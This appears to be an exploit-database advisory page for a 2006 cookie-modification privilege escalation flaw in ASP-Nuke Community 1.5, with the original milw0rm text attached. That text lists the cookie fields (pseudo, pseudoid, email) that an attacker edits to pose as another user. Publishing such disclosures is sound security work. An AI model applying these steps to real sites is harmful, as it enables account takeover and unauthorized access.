header-logo
Suggest Exploit
vendor:
ASP-Nuke Community
by:
ajann
7,5
CVSS
HIGH
Cookie Modification Privilege Escalation
264
CWE
Product Name: ASP-Nuke Community
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability

A vulnerability in ASP-Nuke Community version 1.5 allows an attacker to modify the cookie information and gain access to the system with escalated privileges. By opening the Cookie Editor, the attacker can find cookie information and change the pseudoname, pseudo, pseudoid, and email fields. After saving the changes, the attacker can go to the default.asp page and gain access to the system with escalated privileges.

Mitigation:

Ensure that the application is updated to the latest version of ASP-Nuke Community and that all cookie information is properly secured.
Source

Exploit-DB raw data:

**************************************************************************************************
# Title  :  ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability
# Author :  ajann
# S.Page :  http://www.rot.dk
# D.Page :  http://www.rot.dk/aspnuke/downloads.asp
# Greetz :  Nukedx
**************************************************************************************************

 Cookie
----------

Open the Cookie Editor=>
Find cookie informations.
Change Informations=

Cookie Informations:

ASPNUKE14%5Fpseudoname , pseudoname => "Welcome *USERNAME*" see for
ASPNUKE14%5Fpseudo     , pseudo     =>  Login UserName
ASPNUKE14%5Fpseudoid   , pseudoid   =>  UserId
ASPNUKE14%5Femail      , email      =>  User Email

Save and go to default.asp.


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-25]